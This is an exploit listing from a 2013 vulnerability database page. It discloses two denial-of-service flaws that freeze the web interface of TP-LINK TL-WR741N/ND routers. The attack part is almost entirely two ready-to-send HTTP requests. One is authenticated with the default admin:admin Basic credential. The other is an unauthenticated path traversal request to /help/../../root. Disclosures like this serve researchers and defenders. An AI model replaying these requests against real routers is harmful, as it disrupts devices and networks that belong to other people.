TP-LINK TL-WR741N / TL-WR741ND Denial Of Service



EKU-ID: 3164 CVE: OSVDB-ID:
Author: W1ckerMan Published: 2013-04-22 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


*************************************************************************************
***************************FREEZING TP-LINK WEB INTERFACE****************************
*************************************************************************************
  
************Discovered by Daniel Henrique Negri Moreno (a.k.a W1ckerMan)*************
  
Contact: w1ck3r_man#at#yahoo.com.br
   danielhnmoreno#at#gmail.com
_____________________________________________________________________________________
  
  
Vendor: TP-LINK
Model No. TL-WR741N / TL-WR741ND  
http://www.tp-link.com.au/products/details/?model=TL-WR741ND
  
  
  
**************************** Vulnerability Overview *********************************
  
  
1 - FREEZING TP-LINK WEB INTERFACE (You need to be autenticated)
  
//You need the line Authorization: Basic YWRtaW46YWRtaW4=
//maybe admin admin ????
  
  
GET http://192.168.1.1:80/userRpm/DdnsAddRpm.htm?provider=4 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/userRpm/DdnsAddRpm.htm?provider=4
Authorization: Basic YWRtaW46YWRtaW4=
  
  
  
2 - FREEZING TP-LINK WEB INTERFACE (You don't need autentication)
  
GET http://192.168.1.1:80/help/../../root HTTP/1.1
Host: 192.168.178.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http://192.168.1.1/help/
______________________________________________________________________________________
  
References and others Vuls:
  
http://1337day.com/exploit/description/20372